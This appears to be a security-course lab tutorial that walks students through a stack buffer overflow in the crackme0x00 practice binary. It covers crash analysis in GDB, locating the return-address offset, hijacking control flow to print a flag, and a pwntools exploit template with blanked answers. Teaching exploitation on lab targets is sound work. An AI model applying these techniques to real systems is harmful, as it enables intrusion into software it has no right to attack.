In this tutorial, you'll learn, for the first time, how to write a control-flow hijacking attack that exploits a buffer overflow vulnerability!
There are a few ways to check the reason for a segmentation fault:
Note: "/tmp/[secret]/input" below is a placeholder name for your secret input file in /tmp.
Running GDB:
$ cd ~/tut03-stackovfl/
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > /tmp/[secret]/input
$ gdb ./crackme0x00
> run </tmp/[secret]/input
Starting program: ./crackme0x00 </tmp/[secret]/input
IOLI Crackme Level 0x00
Password: Invalid Password!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Checking logging messages (if you're working on your local machine):
$ dmesg | tail -1
[19513751.485863] crackme0x00[20200]: segfault at 41414141 ip 000000000804873c sp 00000000ffffd668 error 4 in crackme0x00[8048000+1000]
Note: dmesg is disabled on our lab server, but you can use it in your own local environment.
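If you have many crashes to look through, the fields of such a log line can be extracted with a short script. The following is a minimal sketch in plain Python. The helper name parse_segfault_line is hypothetical, and the regular expression assumes only the line format shown in the sample above.

```python
import re
import struct

# Sample line copied from the dmesg output above.
LINE = ("[19513751.485863] crackme0x00[20200]: segfault at 41414141 "
        "ip 000000000804873c sp 00000000ffffd668 error 4 "
        "in crackme0x00[8048000+1000]")


def parse_segfault_line(line):
    """Hypothetical helper: return (fault_addr, ip, sp) as integers."""
    m = re.search(r"segfault at ([0-9a-f]+) ip ([0-9a-f]+) sp ([0-9a-f]+)", line)
    if m is None:
        raise ValueError("not a segfault log line")
    return tuple(int(field, 16) for field in m.groups())


fault_addr, ip, sp = parse_segfault_line(LINE)

# Show the 32-bit faulting address as the four bytes it occupies in memory
# (x86 is little-endian), which makes input-derived values easy to spot.
fault_bytes = struct.pack("<I", fault_addr)
print(hex(fault_addr), hex(ip), hex(sp), fault_bytes)
```

A faulting address that decodes to printable characters from your input, as it does here, is a strong hint that the input overwrote a pointer.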
Checking logging messages (if you're working on our server):
When you're working under /tmp/ (and only then), our server stores dmesg-like logging information for you whenever a lab challenge crashes. For example, you can find a logging output file named "core_info" under your /tmp/[secret]/ directory if you crash our tutorial binary, crackme0x00:
$ mkdir /tmp/[secret]/
$ cd /tmp/[secret]/
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > input
$ cat input | ~/tut03-stackovfl/./crackme0x00
...
$ ls
core_info  input
$ cat core_info
[New LWP 18]
Core was generated by `/home/lab03/tut03-stackovfl/crackme0x00'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x41414141 in ?? ()
eax            0x0          0
ecx            0x804b160    134525280
edx            0xf7fbe890   -134485872
ebx            0x0          0
esp            0xffffd5e8   0xffffd5e8
ebp            0x41414141   0x41414141
esi            0xf7fbd000   -134492160
edi            0x0          0
eip            0x41414141   0x41414141
eflags         0x10292      [ AF SF IF RF ]
cs             0x23         35
ss             0x2b         43
ds             0x2b         43
es             0x2b         43
fs             0x0          0
gs             0x63         99
The instruction pointer was overwritten with 0x41414141 ("AAAA", part of our input string). Let's figure out exactly which part of our input tainted the instruction pointer.
$ cd /tmp/[secret]/
$ echo AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ > input
$ cat input | ~/tut03-stackovfl/./crackme0x00
$ dmesg | tail -1
[19514227.904759] crackme0x00[21172]: segfault at 46464646 ip 0000000046464646 sp 00000000ffffd688 error 14 in libc-2.27.so[f7de5000+1d5000]
What's the instruction pointer's value now, as a string? (man ascii might help.) Can you now tell what part of the string is overwriting it?
You can infer the shape of a function's stack frame from the function's disassembly (for example, with Ghidra or objdump):
$ objdump -M intel-mnemonic -d crackme0x00
...
080486b3 <start>:
 80486b3: 55          push   ebp
 80486b4: 89 e5       mov    ebp,esp
 80486b6: 83 ec 10    sub    esp,0x10
...
Let's analyze how the stack frame is constructed:
When start is called (by whatever other function calls it), the call instruction automatically pushes the return address onto the stack. So every stack frame has the return address ("ra") at the top, that is, at its highest-address end, and esp points at it when the function begins:
       esp
        V
 <...> [ra]
ebp is a register that's used to point to the top of the current function's stack frame. When the function begins, "push ebp" pushes that register's previous value (from the calling function) to the stack, so that it can be properly restored later when the function returns. Then mov ebp,esp updates ebp to be correct for the current function.
     ebp/esp
        V
 <...> [bp] [ra]
sub esp,0x10 reserves 0x10 bytes for local variables.
 esp          ebp
  V            V
  [??????????] [bp] [ra]
  |<- 0x10 ->|
Looking down a bit farther, at the call to scanf:
...
 80486d3: 8d 45 f0          lea    eax,[ebp-0x10]
 80486d6: 50                push   eax
 80486d7: 68 11 88 04 08    push   0x8048811
 80486dc: e8 9f fd ff ff    call   8048480 <scanf@plt>
...
Arguments are pushed in reverse order, so the first argument is 0x8048811 (you can check what's at that address: it's "%s"), and the second is ebp-0x10. scanf writes the string it reads to the address given by its second argument, so we can consider that area on the stack to be the buffer.
There could be other local variables within that 0x10 bytes, but in this case there aren't any. The only way to find out exactly how the local variables are arranged is to study the entire function (perhaps with the help of a decompiler) and see how it uses its stack frame.
So for our long, overflowing input string, the first 0x10 bytes will fit in the 0x10-byte buffer, the next 4 will overwrite the stored ebp, and the next 4 will overwrite the return address, which is what the instruction pointer will be set to when the function returns. That's why it ended up as FFFF: those are the four bytes at offsets 0x14 through 0x17 of our input.
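The same offset can be found mechanically. This is a small sketch using only the standard library: it converts the crashed instruction pointer back into the four bytes it had in memory (little-endian) and searches for them in the pattern we sent. The variable names are illustrative.

```python
import struct

# The pattern written to the input file earlier in this tutorial.
pattern = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"

# Instruction pointer value reported in the crash log for that input.
crashed_eip = 0x46464646

# A 32-bit value is stored least-significant byte first on x86.
needle = struct.pack("<I", crashed_eip)

# Offset of those four bytes within the input.
offset = pattern.find(needle)
print(needle, hex(offset))
```

The offset equals the buffer size (0x10) plus the 4 bytes of the stored ebp, which matches the stack frame derived from the disassembly.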
What do you expect ebp to end up as? Check core_info and see if you're right!
In this tutorial, we're going to hijack the control flow of crackme0x00 by overwriting the instruction pointer. As a first step, let's make it print out Password OK :) without giving it the correct password!
  80486ed: e8 2e fd ff ff    call   8048420 <strcmp@plt>
  80486f2: 83 c4 08          add    esp,0x8
  80486f5: 85 c0             test   eax,eax
  80486f7: 75 31             jne    804872a <start+0x77>
->80486f9: 68 3e 88 04 08    push   0x804883e
  80486fe: e8 6d fd ff ff    call   8048470 <puts@plt>
  ...
  804872c: 68 92 88 04 08    push   0x8048892
  8048731: e8 3a fd ff ff    call   8048470 <puts@plt>
  8048736: 83 c4 10          add    esp,0x10
We're going to jump to 0x80486f9 so that it'll print out Password OK :).
Which characters in the input should be changed to 0x80486f9? Keep in mind that x86 is a little-endian architecture.
$ hexedit /tmp/[secret]/input
"Ctrl+X" will exit and let you save your changes.
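As an alternative to editing the file by hand, the input can be generated with a script. The sketch below uses only Python's standard library. The helper build_payload is hypothetical, and 0xdeadbeef is a placeholder rather than the address you need; the buffer size comes from the disassembly above. Note that scanf with "%s" stops reading at whitespace, so this approach assumes none of the packed bytes is a whitespace character.

```python
import struct

BUF_SIZE = 0x10  # size of the buffer at ebp-0x10, taken from the disassembly


def build_payload(ret_addr, saved_ebp=0x42424242):
    """Hypothetical helper: filler, then saved ebp, then return address."""
    return (b"A" * BUF_SIZE
            + struct.pack("<I", saved_ebp)   # overwrites the stored ebp
            + struct.pack("<I", ret_addr))   # overwrites the return address


# 0xdeadbeef is a placeholder; substitute the address you want to return to.
payload = build_payload(0xdeadbeef)
print(payload)

# To feed it to the program, write it out with a trailing newline, e.g.:
# with open("input", "wb") as f:
#     f.write(payload + b"\n")
```

Printing the payload shows the address bytes in reversed order compared with how the address is written in hex, which is the little-endian layout the question above is asking about.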
$ cat input | ~/tut03-stackovfl/./crackme0x00
IOLI Crackme Level 0x00
Password: Invalid Password!
Password OK :)
Segmentation fault
Today's main task is to modify a Python template for exploitation. Please edit the provided Python script (exploit.py) to hijack the control flow of crackme0x00! Most importantly, to get the flag, you need to hijack the control flow to reach unreachable code in the binary.
// To get the flag, your input seemingly needs to be both "250381"
// and "no way you can reach!" at the same time!
  8048706: 68 4d 88 04 08    push   0x804884d
  804870b: 8d 45 f0          lea    eax,[ebp-0x10]
  804870e: 50                push   eax
  804870f: e8 0c fd ff ff    call   8048420 <strcmp@plt>
  8048714: 83 c4 08          add    esp,0x8
  8048717: 85 c0             test   eax,eax
  8048719: 75 1c             jne    8048737 <start+0x84>
->804871b: 68 63 88 04 08    push   0x8048863
  8048720: e8 d1 fe ff ff    call   80485f6 <print_key>
In this template, we will start using pwntools, which provides a set of libraries and tools that help with writing exploits. Although we'll cover the details of pwntools in the next tutorial, you can get a glimpse of how it looks here.
#!/usr/bin/env python3

# import variables/functions from pwntools into our global namespace,
# for easy access
from pwn import *

if __name__ == '__main__':

    # p32/64 for "packing" 32- or 64-bit integers
    # so, given an integer, it returns a packed (i.e., encoded) bytestring
    assert p32(0x12345678) == b'\x00\x00\x00\x00' # Q1
    assert p64(0x12345678) == b'\x00\x00\x00\x00\x00\x00\x00\x00' # Q2

    payload = b'Q3. your input here'

    # launch a process (with no arguments)
    p = process(['./crackme0x00'])

    # send an input payload to the process
    p.send(payload + b'\n') # or, shorter: "p.sendline(payload)"

    # make it interactive, meaning that we can interact with the
    # process's input/output (via a pseudo-terminal)
    p.interactive()
Modify Q1-3 in the template to make this exploit work.
[Task] Modify the template (exploit.py) to hijack the control flow and print out the flag.
If you'd like to practice more, can you make the exploit gracefully exit the program after hijacking its control multiple times?
Let's discuss how we can utilize the set exec-wrapper feature in GDB to better match the process's behavior outside the debugger. When exec-wrapper is set, the specified wrapper is used to launch programs for debugging. GDB starts your program with a shell command of the form exec-wrapper program. Any program that eventually calls execve on its arguments can be used as a wrapper.
For example, you can use env (learn about it: man env) to pass an environment variable to the debugged program, without setting the variable in your shell’s environment:
(gdb) set exec-wrapper env 'LD_PRELOAD=libtest.so'
(gdb) run
For further reading about exec-wrapper, please refer to the "Starting your Program" section of the GDB manual.
In order to get a predictable stack in a system with ASLR disabled, set exec-wrapper env -i can be used to ensure that the program is launched in an empty environment while debugging. For example, you can use it when getting a core dump:
$ mkdir /tmp/[secret]/
$ cd /tmp/[secret]/
$ gdb-pwndbg ~/tut03-stackovfl/crackme0x00
pwndbg> set exec-wrapper env -i
pwndbg> r
Starting program: /home/lab03/tut03-stackovfl/crackme0x00
IOLI Crackme Level 0x00
Password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Invalid Password!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
pwndbg> gcore
Saved corefile core.545
Note that "set exec-wrapper env -i" is a default GDB setting on the lab server. If you don't want to use it, please disable it before debugging, e.g.,
$ export SHELLCODE="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$ gdb-pwndbg ~/jmp-to-env/target
pwndbg> unset exec-wrapper
pwndbg> r BBBB
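On Linux, environment variables are stored at the top of the stack when a program is launched. Thus, the main reasons why stack addresses in GDB can differ from those seen when running the program by itself are that GDB adds the LINES and COLUMNS variables to the program's environment, and that the _ variable (which the shell sets to the path of the command being run) and the path used to launch the program may have different values.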
Hence, to make stack addresses consistent, we need to:
Use absolute paths when executing inside and outside of GDB, e.g.,
$ env -u _ /home/lab03/jmp-to-env/target [input]
Remove extra env variables, e.g.
pwndbg> set exec-wrapper env -u LINES -u COLUMNS -u _
By setting the exec-wrapper above, we can remove the three extra env variables while debugging so that the environment inside GDB matches the environment outside of it.
Or, alternatively, use env -i as your exec-wrapper to remove all environment variables, and run the binary outside of GDB with env -i as well.
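To see why a few extra variables matter: each environment variable is copied onto the new process's stack as a NUL-terminated NAME=value string, so adding, removing, or lengthening a variable shifts everything stored below it. The sketch below gives a rough estimate of that effect. The helper env_strings_size is hypothetical, the sample environments are made up for illustration, and the calculation ignores alignment and the pointer arrays the kernel also places on the stack.

```python
def env_strings_size(env):
    """Hypothetical helper: bytes used by the NAME=value strings,
    counting one NUL terminator per variable."""
    return sum(len(f"{name}={value}".encode()) + 1
               for name, value in env.items())


# Made-up example environments (not taken from the lab server).
outside_gdb = {
    "HOME": "/home/lab03",
    "_": "/home/lab03/jmp-to-env/target",
}
inside_gdb = dict(outside_gdb, LINES="24", COLUMNS="80", _="/usr/bin/gdb")

# A non-zero difference means stack contents sit at different addresses.
delta = env_strings_size(inside_gdb) - env_strings_size(outside_gdb)
print(delta)
```

Even a difference of a few bytes is enough to break an exploit that relies on a hard-coded stack address, which is why the environments inside and outside GDB need to match exactly.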